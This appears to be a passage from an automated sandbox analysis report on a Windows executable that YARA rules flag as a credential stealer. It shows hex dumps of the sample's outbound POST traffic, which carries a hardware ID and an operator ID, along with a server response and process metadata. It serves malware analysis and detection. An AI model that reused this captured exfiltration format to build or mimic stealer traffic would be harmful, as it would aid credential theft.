                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: 2d 2d 42 48 54 34 4b 41 4c 36 43 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 34 30 34 41 37 36 30 30 46 36 44 30 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 48 54 34 4b 41 4c 36 43 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 48 54 34 4b 41 4c 36 43 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 42 48 54 34 4b 41 4c 36 43 34 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                            Data Ascii: --BHT4KAL6C4Content-Disposition: form-data; name="hwid"33404A7600F6D0ACAC8923850305D13E--BHT4KAL6C4Content-Disposition: form-data; name="pid"1--BHT4KAL6C4Content-Disposition: form-data; name="lid"PsFKDg--pablo--BHT4KAL6C4Content-
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: ac d4 93 80 20 4e d3 e7 de 69 9d 86 26 6e cd 25 14 00 79 3e 50 e6 30 07 2d 87 95 9e 3b 80 79 95 6e ea 00 70 e2 34 cd 92 b8 bc d8 1f 72 18 6f 70 ab 46 7b 12 22 33 a4 be e8 99 a3 42 97 af 77 df d2 16 ed 08 25 46 84 4b 41 c5 b1 14 94 6e 33 6e dc c1 bc 2d 83 9c 27 07 ae af 98 49 87 1f d0 e4 6b b8 16 c0 c3 22 c7 0c dd 15 1a 0c 2d ef 46 55 99 0f 98 a5 57 58 e2 9b c7 64 0c a5 57 ff 45 13 53 43 f4 36 cb f6 ef 95 fc bb 6c 0b f9 db c6 a6 ba 2e 52 23 dd 63 78 76 e0 ee 2a a7 a1 28 95 af b3 88 4b 23 d7 b7 22 97 1d 36 94 07 84 e6 8f bb cd 1c 00 97 8c d2 22 c2 92 26 c5 9f 0b 64 2e c6 2b eb c9 69 70 9a 34 a8 ba b3 47 3a 8c 0f 3b 70 5d 0a 1a 06 98 62 e3 ee 4a e4 fc 7f 65 31 7e f1 f5 61 3b 47 dd 54 5a 34 0e 3a 1b bc 68 41 7d d4 3f 24 c3 73 7e 44 45 3f be 21 40 ad d5 84 8f
                                                                                                            Data Ascii: Ni&n%y>P0-;ynp4ropF{"3Bw%FKAn3n-'Ik"-FUWXdWESC6l.R#cxv*(K#"6"&d.+ip4G:;p]bJe1~a;GTZ4:hA}?$s~DE?!@
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: e9 49 b6 2d e5 be 73 78 76 f1 00 08 28 ce f1 ab 5e b5 0c b2 de ae 57 d7 b8 dd b5 07 d1 17 3c 5c 51 f0 e4 73 7d d8 55 d4 cb 47 36 7c bf 56 fa 5a f8 f8 67 bd 5e 93 65 23 f7 9e ca 76 65 8c f7 ec f1 3d 62 9e 1c 22 25 f0 5a 49 42 e9 21 8f 53 7f 6e 0b a1 63 b2 d3 c0 7c 89 81 a8 65 f4 da c9 57 5f ab 75 96 4d 92 43 d5 cc d2 5c 76 ec 3d 12 ad 47 b2 0c e1 e8 93 c9 d8 34 bc 71 a4 c2 bc 5a f9 43 f7 28 20 e4 54 9e 9a 26 c4 2a 15 fa 59 ed b1 1d a1 c9 44 4f de d3 08 a5 3e 81 7b ec 84 a4 57 7f 7e 7e 59 cb cb 31 97 f9 ee ad fa 0c 16 bf 67 bf 0a 84 5e 08 26 89 e7 34 c8 15 6b c9 e4 77 f9 b7 b1 43 f3 c4 8d 06 14 94 30 54 24 66 07 86 68 2c 34 3f 25 b8 fb 63 ba 02 f1 bc b5 d8 7d c7 e3 aa 93 7c d7 26 69 2f f6 bf ba 3e 9f ea 89 ed eb 0d 8e c2 1f ef 23 ca ec aa a1 63 67 2c 6b 9c
                                                                                                            Data Ascii: I-sxv(^W<\Qs}UG6|VZg^e#ve=b"%ZIB!Snc|eW_uMC\v=G4qZC( T&*YDO>{W~~Y1g^&4kwC0T$fh,4?%c}|&i/>#cg,k
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: 49 30 0f ff c2 17 f8 a3 8a 7b 05 ed f3 77 25 7b 3c 12 85 58 69 2d 3f 43 7e 68 7c 7e e3 14 f2 0d fd 65 cf 45 1e 78 7f 11 e8 42 c3 de ac af 29 70 74 b9 00 c4 fc 27 e3 30 d0 1e 2b a9 47 37 28 83 17 a2 56 ae 55 a7 c7 15 e7 b5 00 ed 7d 50 81 31 e3 03 4a d8 34 6c 12 73 69 34 09 24 6a a0 42 12 6c e5 3a 02 47 b3 ae 37 9d 3e 51 fd 7e 7c e1 b8 b3 40 97 f6 70 e9 ad ee 6a d2 dc 6f 19 ba e2 65 e5 aa 5b 79 cb 5c 17 41 a3 b0 04 2c ec 2a 68 62 d4 c0 f6 26 7c 03 a4 ce 8c 01 93 31 ec 1f 39 7d ad 76 ca b3 82 52 fe cf b7 5d 7f 33 3e 2b 71 ee 3d a6 ca 7d 17 8b 53 1e e7 79 33 dd 6a 4c a1 18 6b 63 21 ae a7 4f 4c 29 6a fa 33 ab a4 c5 6d 46 f7 de 31 17 0d 54 f0 29 29 f3 7a 45 37 20 82 1a bb 4c 7a a0 13 2e f3 e7 63 41 42 62 c2 7b a7 b2 c0 0c f9 a0 00 43 5c e2 29 06 86 ee 7c 34 63
                                                                                                            Data Ascii: I0{w%{<Xi-?C~h|~eExB)pt'0+G7(VU}P1J4lsi4$jBl:G7>Q~|@pjoe[y\A,*hb&|19}vR]3>+q=}Sy3jLkc!OL)j3mF1T))zE7 Lz.cABb{C\)|4c
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: 87 41 7d f3 51 21 73 3e 83 11 15 9d f5 2e 52 7f 16 a5 76 a7 16 ff c7 df 6a ef 91 2a 83 fe 37 21 93 80 f9 ee d4 c4 bd 38 9f 17 74 fb 88 4c dc 06 5c e2 12 7f bd 2a 71 5a e8 43 21 90 e6 ad 7b 54 50 b0 31 e4 6f 61 5f e8 cb d3 5f ae cd 2e 02 c7 1c c2 e3 d8 1f 56 22 49 56 5d 9e 7e c9 f3 1a 32 9e ae b5 ec cf cb 96 f1 f3 96 77 ab 9a f6 c9 f6 87 4d 47 49 69 a7 4a a1 33 fe d5 2a 61 61 63 b5 d2 f1 25 31 37 13 e2 e7 82 07 62 b4 4a 34 ed 2f d6 2b 7d 0b 49 e8 b5 6c b9 4c 27 19 a5 9b 46 f6 73 7c 16 c9 35 23 5a 57 5c aa 01 1c 15 0d 42 a3 c2 1d be 2a ee e6 69 f2 58 46 07 ee f2 85 da 0b 4b 6e 92 3b 76 12 a0 55 e1 ce f7 dd 26 90 e3 88 c1 a7 b2 90 6a 23 5d 8c 8f 90 76 6c fa f7 a0 41 79 c1 1d 22 0a 3f 4e 9b db e6 78 31 10 60 ba bc 95 6b 62 e5 40 9b 5a b5 ee 76 73 43 ff f8 e5
                                                                                                            Data Ascii: A}Q!s>.Rvj*7!8tL\*qZC!{TP1oa__.V"IV]~2wMGIiJ3*aac%17bJ4/+}IlL'Fs|5#ZW\B*iXFKn;vU&j#]vlAy"?Nx1`kb@ZvsC
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: c9 e1 77 12 ec 3f 94 85 5e cf 88 89 d6 13 d9 18 4e d4 4a d5 6d a9 f4 7a 7d 45 1b 65 6f 14 2f 5b fc fb 5a 31 9a 51 b1 f2 af 56 f9 98 2e 98 91 44 b5 20 05 ee 2e 48 10 05 2a ac fb 06 83 15 da 6f db b4 64 25 b9 9d 8d 86 6f ed 06 b9 b3 e6 20 c3 b8 3c 7c 47 cd 93 bd 05 0f a3 56 50 e0 b5 3e b0 95 e0 9d fb 24 5e 72 b2 39 9f 3c df b1 6e 77 03 58 19 39 aa cd 3f dc 1e 56 74 96 d9 b5 3e dc 6e 71 14 95 0b bc 75 2f c2 cb 20 03 1b 1e 15 7a 19 ab 88 09 e9 ec cf 9e 3e 9e 58 30 95 5b 69 b5 b3 7b 2b a5 d5 b0 13 bb 31 b1 6e ad 95 a1 0b fd 14 88 b5 bd 81 5f fa b5 7e 03 2f 56 2a 0d 1f 62 14 52 2d 33 49 55 e9 03 17 f1 f8 24 52 d7 d0 66 21 20 46 88 b6 cd be dc 01 46 cb ab c9 fc 40 fa 4f f3 b1 40 6b 55 ed 69 e1 71 be 0e 0d 24 6c 2e f4 17 e8 11 21 6e cf 73 53 3f c2 4f 24 15 6c 20
                                                                                                            Data Ascii: w?^NJmz}Eeo/[Z1QV.D .H*od%o <|GVP>$^r9<nwX9?Vt>nqu/ z>X0[i{+1n_~/V*bR-3IU$Rf! FF@O@kUiq$l.!nsS?O$l
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: d0 b6 96 d2 62 bd bd 04 03 c4 a0 9e 2c 7f 45 3b ae de da da 73 24 0b e7 29 1e d7 fb 2b a4 58 69 51 d9 9f d5 33 2e ec 09 fe ae 80 c1 85 d6 91 a0 6b dd 16 44 f4 fe 4b 92 d8 a6 e6 ba 77 bf b6 d3 bc 15 b6 30 f0 0b d0 73 b7 c7 a5 f4 26 59 5b 4d df 8b 53 38 49 df 48 a9 8f 9c fd 8f 0d 91 0a c3 53 15 40 c2 49 ea 9f fc e9 d7 9e 9e 83 14 92 8e fb d8 13 1a b7 3e 9f 9e 55 e2 f4 37 54 99 7f 07 db 9a 80 b5 1e 4e fd 6f bc f3 9d bd e0 fd 15 bb bd 7f 65 a9 ef 63 f6 67 ff 13 f3 ec da 9d 86 90 33 4f e2 23 bf 7c 37 5a 79 7b 32 3f 59 47 d4 35 b4 5f ea 66 e9 f1 84 85 46 32 65 d1 f4 f6 fa ae 23 7b 6e 9f 36 cc 8b a7 04 56 6b 64 91 5f cb 85 5f ca 23 ec 69 b7 4d ca 43 c6 f6 05 06 07 23 25 e4 27 8f c6 69 34 93 0a 76 cb ba ff 6f 1c 5c 3b 44 7b 8b 26 96 c0 d6 1c 52 4d 81 df 76 c1 14
                                                                                                            Data Ascii: b,E;s$)+XiQ3.kDKw0s&Y[MS8IHS@I>U7TNoecg3O#|7Zy{2?YG5_fF2e#{n6Vkd__#iMC#%'i4vo\;D{&RMv
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: 94 89 ec 9f 3e 95 0d 08 1d 18 5d 58 75 b3 8c 5d c6 41 b1 32 50 bb 0f 7a 09 23 6d 1f 26 ef 95 93 ca 11 c0 cc 87 b4 c3 68 97 50 e8 fe 60 84 51 71 e8 1d 58 78 c1 a6 8f 92 d6 cb 2b d8 3c 24 25 9b 4e d8 0d 8a 00 e9 cc 82 3c d9 de 50 84 fe 69 3e f4 96 40 f8 1c 68 33 40 59 f7 58 04 51 0b 15 48 9e ca 43 72 6f 0e 7f 80 e1 ef 23 c9 92 30 51 e9 57 b6 ba 7d 92 7e 4e a6 eb 8a 7d cc 64 54 b8 92 eb dc 51 8b eb b9 72 16 bd b9 b8 01 4e e0 83 a7 8b 42 be 11 01 8a c1 76 98 9c c8 34 bd 74 8f ca 2d b3 ef 1f 0c cd a3 e3 65 d9 83 55 bd 66 97 b9 ae f6 1d a2 a7 fe f7 34 b2 dd 17 4b bf 83 d2 5b a1 1f 62 55 d7 1c 96 0d 67 47 65 4c 27 fb 02 86 38 32 41 c2 46 28 97 16 a6 8e 32 36 3b 1e 11 91 82 f6 15 30 32 02 b8 90 28 5e f9 5e 21 ea 6e da 91 a3 71 33 b0 9f 2c bc a9 b5 6e 0c 7f 30 e2
                                                                                                            Data Ascii: >]Xu]A2Pz#m&hP`QqXx+<$%N<Pi>@h3@YXQHCro#0QW}~N}dTQrNBv4t-eUf4K[bUgGeL'82AF(26;02(^^!nq3,n0
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: 67 57 f3 c2 c9 d6 ee 98 fd da 5d bf 9f c5 62 d4 b7 85 9c 80 d0 75 3a 4b 25 cc 81 34 fe 7b 45 a3 d9 c7 17 6d 5e 54 91 81 3e 7e 12 20 14 71 2e be 96 ce c7 69 78 18 83 e9 47 d5 04 6f 73 42 12 38 13 25 c4 54 28 7b 97 63 44 f3 bd 8e 65 51 e0 17 36 e8 fb d7 22 f8 25 0e 34 70 ab 42 40 77 16 f4 f6 02 3b 28 0d c1 54 42 65 23 60 31 6f de 19 43 a1 52 34 9c d2 1b 51 86 20 63 d9 00 fe f2 fe 5f 1f c6 51 80 6d c9 78 c0 bc f3 0b 66 97 9c 8f 45 0c 74 9e 45 d7 94 ea c3 cc 7f e2 fb 55 0f 6c b7 d6 b5 36 30 80 b8 33 d3 58 f0 f3 9b 95 83 ec 08 f8 af 97 2c 13 c9 d0 3c e0 56 63 58 48 84 28 87 25 66 ae 9d b0 36 06 f5 63 ba 2f d4 1c 05 bf e8 fb 08 1f 19 01 a1 3e e0 c0 54 e9 a3 81 c0 64 b4 c3 4d 21 ed 26 c4 58 54 12 83 69 6a da a0 77 5e bb 8a 2d 4c 88 11 2f fe 80 e2 11 b3 07 cf 1b
                                                                                                            Data Ascii: gW]bu:K%4{Em^T>~ q.ixGosB8%T({cDeQ6"%4pB@w;(TBe#`1oCR4Q c_QmxfEtEUl603X,<VcXH(%f6c/>TdM!&XTijw^-L/
                                                                                                            2024-12-18 20:17:36 UTC15331OUTData Raw: 7e f8 53 80 c4 bf e5 15 3e 06 cc 07 5b 55 95 9b 1c e6 dc 53 e0 87 10 2c 33 e7 87 e3 4c 25 57 be 7f 0a 8b 6c 18 41 95 8e c1 54 7d 90 40 60 ec 44 24 df 23 74 5e ee 50 75 a2 75 03 a5 0e 31 70 3a 80 22 ad 7b 1a 58 ff 8c 3f 3f 79 3d 76 f6 10 5b 15 b5 2a 10 6c 8e 34 19 c4 75 0f 06 c2 ec 50 a8 f4 ea 35 94 81 ec f2 56 6c 8d 59 2f dd 2e 56 3a d8 c0 de d2 4d e7 0a 3b 28 53 f0 7d e6 aa e6 2a 83 aa 5f 4d 9d 34 40 fb 39 ba ef e2 3b df 19 55 65 d8 41 95 df 92 8b dc 22 ea 03 c6 09 4b c1 be 73 e6 45 98 df 48 39 cf 3b ec 43 12 3c 69 66 4b f5 37 a4 97 98 08 71 2e bd 07 39 17 51 2b 5e ae 4e 26 21 cc 11 e4 b8 3f 92 ed 3b 08 9f c4 cb 77 ce 7b 36 ad d5 cd 8e 37 e7 03 6f a5 af 6a 12 d8 9d e0 f7 31 e6 66 85 2f b5 3f 07 c3 7a 86 6b 25 7f bb 29 25 11 5a 9a 84 b6 fc ce 9a 0e b3 bc
                                                                                                            Data Ascii: ~S>[US,3L%WlAT}@`D$#t^Puu1p:"{X??y=v[*l4uP5VlY/.V:M;(S}*_M4@9;UeA"KsEH9;C<ifK7q.9Q+^N&!?;w{67oj1f/?zk%)%Z
                                                                                                            2024-12-18 20:17:44 UTC | 1036 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:44 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=957q2gmu10a1lo4jru9jfq3os7; expires=Sun, 13-Apr-2025 14:04:17 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0QRhWJWickX4wexws6dyx7jl9vPtPLKNS%2F1cP7aKJgSxqarnwnQ5W84DU0tPgjy4Gy8v1gPOGvTxZeORbwEftHOdv1YdENMTTZ%2Fmoj5sRCpcRBSG5ghRWITScgfSvtz"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d65b3cd04294-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1590&rtt_var=1405&sent=317&recv=578&lost=0&retrans=0&sent_bytes=2830&recv_bytes=553539&delivery_rate=605181&cwnd=217&unsent_bytes=0&cid=77363c6ecb239fdf&ts=7915&x=0"


                                                                                                            Target ID:0
                                                                                                            Start time:15:16:59
                                                                                                            Start date:18/12/2024
                                                                                                            Path:C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\pPizCGDvrx.exe"
                                                                                                            Imagebase:0xbc0000
                                                                                                            File size:1'871'360 bytes
                                                                                                            MD5 hash:604FC7AC851C76B3ADE50108357D8134
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1603193401.000000000115A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1603110801.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            No disassembly